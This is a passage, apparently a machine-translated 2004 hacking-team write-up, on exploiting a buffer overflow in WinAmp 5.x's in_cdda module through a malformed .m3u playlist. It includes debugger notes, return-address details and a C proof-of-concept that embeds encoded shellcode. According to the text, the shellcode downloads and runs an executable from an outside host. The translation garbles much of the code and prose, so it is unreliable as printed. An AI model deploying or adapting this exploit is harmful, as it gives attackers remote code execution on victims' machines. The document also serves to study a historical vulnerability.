Author: ZwelL
Date: 2004.11.29
Team: shadoweyes
The last week Brett Moore released WinAmp overflow vulnerabilities in Bugtrag, saying that there is a streak overflow in the in_cdda module, affected by 5.05 and 5.06. Later, K-Otik announced the MessagBox test against the vulnerability and gave it. The relevant code. But in later tests, I found that the code given by K-OTIK did not test. So some debugles have been carried out. Some problems were found.
Let's take a look at the part of the problem: WINAMP will call IN_CDDA.DLL when the playlist file (.m3u) is turned on and processes .cda. However, the CDDA library can only store limited bytes (K-Otik's results on Windows Spanish XP Pro are 20 bytes, and 12 bytes in the Chinese version of Windows2003 Server), resulting in buffer overflow.
Use ollydbg to debug, first generate a deformity playlist file with a program:
#include
#include
#define header "# extm3u / n"
Char shellcode [] =
"C: //1234567890ab1234.cda";
Int main (int Argc, char * argv [])
{
File * fp;
Char * sc = (char *) Malloc (SIZEOF (SHELLCODE) 1);
IF (sc == null)
{
Printf ("Malloc Error / N");
Return -1;
}
MEMSET (SC, '/ 0', SIZEOF (SC));
Memcpy (sc, shellcode, sizeof (shellcode));
FP = FOPEN ("Test.m3u", "W ");
IF (! fp)
{
Printf ("Error Opening File./N);
Return -1;
}
FWRITE (Header, 1, Strlen (HEADER), FP);
FWRITE (SC, 1, Strlen (SC), FP);
Fclose (fp);
Return 0;
}
///
Use ollydbg to open Winamp, open the generated file play, OLLYDBG will stop at 10009bd8
10009BD8 884C04 30 MOV BYTE PTR SS: [ESP EAX 30], CL
When you continue to execute, the execution exception occurs:
Access violation when executing [38373635]
That is, the location of 5678 is the location where the time is to be jumped. We can control this. One thing to pay attention to, WinAmp will handle the first exception in the actual playback process, which will not perform our shellcode when the second exception occurs.
What to do now is the positioning problem of shellcode, here is given related data:
IN_CDDA:
Base = 10000000
Size = 00031000
Entrance = 1000CE1A
Data break (.DATA) offset: 00054000
Start filling our shellcode, then open and play the playlist, when ollydbg stops, let's go to the IN_CDDA's footproof search for the data we filled. There is a difference between different systems in different systems, and in 2003,
Version 5.02: 10023543
Version 5.05: 10024561
So to reach the versatility of shellcode, in this middle, a large amount / x90 is to be filled, (after discovery is still not feasible, because there is a limit of byte).
During the debugging process, found to remove the .cda bytes, plus C: / 1234xxxx, we can only populate 254 bytes, which is relatively high for shellcode requirements. (In the overflow program given below, I am using it.
http://zwell.3322.org/a.exe, who knows hard is exceeding the byte limit, no way, have to change the program name to A.a, just can be executed, ^ _ ^).
The code for generating a deformity playlist file is given below:
#include
#include
#define header "# extm3u / n"
Char shellcode [] =
"C: // 1234"
"/ x43 / x35 / x02 / x10"
"/ XEB / X0E / X5B / X4B / X33 / XC9 / XB1 / XF1 / X80 / X34 / X0B / X88 / XE2 / XFA / XEB / X05"
"/ Xe8 / XED / XFF / XFF / XFF"
"/ X61 / X2C / X88 / X88 / X88 / XD7 / XEC / X29 / XB8 / X88 / X88 / X88 / X03"
"/ x03 / x94 / x25 / x03 / x7f / xe2 / x8c / xd1 / x60 / xcc / x88 / x88 / x88"
"/ X6A / X71 / XE0 / XE7 / XE6 / X88 / X88 / XE0 / XFD / XFA / XE4 / XE5 / XDC / X77 / X9E / X03"
"/ x60 / x88 / x88 / x0b / x64 / xa8 / x03 / x54 / xe2 / xa8 / xdb / x77 / xde"
"/ X8C / X4F / X8C / X8B / XD4 / XE9 / XA6 / XED / X4F / XCC / X8B / X8C / XF0 / XED / X88 / X88"
"/ xbb / x48 / xd8 / xd8 / xdb / xdf / xd8 / x77 / xde / x98 / x03 / x54 / xd8 / xdb / x77 / xde"
"/ x80 / x77 / xde / x84 / xd9 / xde / x03 / xfd / xb4 / x03 / xfc / xa6 / xf0 / x8b / x7d / xde"
"/ x03 / xfe / xa8 / x8b / x7d / xbb / x41 / xc1 / xc9 / x25 / x8b / x4d / xbb / x53 / x87 / x36"
"/ X98 / XB2 / X5E / XFC / X80 / X49 / X43 / X85 / X8B / X52 / XC8 / X63 / XFD"
"/ X6F / XD6 / X03 / XD6 / XAC / X8B / X55 / XEE / X03 / X84 / XC3 / X03 / XD6 / X94 / X8B / X55"
"/ x03 / x8c / x03 / x8b / x4d / x23 / xd6 / xd1 / x4b / x60 / xdf / x77 / x77 / x77 / x06 / xc6"
"/ x86 / x64 / x49 / x10 / x76 / x02 / x86 / xf6 / x50 / x6a / xfb / xbe / x92"
"/ Xa7 / XF8 / XE0 / XFC / XFC / XF8 / XB2 / Xa7 / Xa7 / XF2 / XFF / XED / XE4 / XE4 / XA6 / XBB" / XBB / XBA / XBA / XA6 / XE7 / XFA / XEF / XA7 / XE9 / XA6 / XE9 / X88 / X90 "
".cda";
Int main (int Argc, char * argv [])
{
File * fp;
Char * sc = (char *) Malloc (SIZEOF (SHELLCODE) 1);
Printf ("WINAMP 5.X M3U Parsing Poc - Advisorie BRETT MOORE / N");
Printf ("Author: Zwell / TDATE: 11.29 / N");
Printf ("THX TO K-OTIK / N");
Printf ("TESTED ON WINAMP 5.02, Windows 2003 Server / N / N");
IF (sc == null)
{
Printf ("Malloc Error / N");
Return -1;
}
MEMSET (SC, '/ 0', SIZEOF (SC));
Memcpy (sc, shellcode, sizeof (shellcode));
FP = FOPEN ("Test.m3u", "W ");
IF (! fp)
{
Printf ("Error Opening File./N);
Return -1;
}
FWRITE (Header, 1, Strlen (HEADER), FP);
FWRITE (SC, 1, Strlen (SC), FP);
Fclose (fp);
Printf ("File Test.m3u Created./N");
Return 0;
}
After playing the generated playlist file, you will download
Http://zwell.3322.org/a.a and renamed a.exe and then executed, execution results are a pop-up dialog box: Winamp Buffer overflow Testing.
In the end, there is a problem, in the last, I used / x90, theoretically, it is not necessary, but actually if you don't have this NOP instruction, shellcode will not perform, it seems to be "." If you know, please explain it. ^ _ ^
Article technical content == 0, only hope to practice hands for beginners. . . ;-)
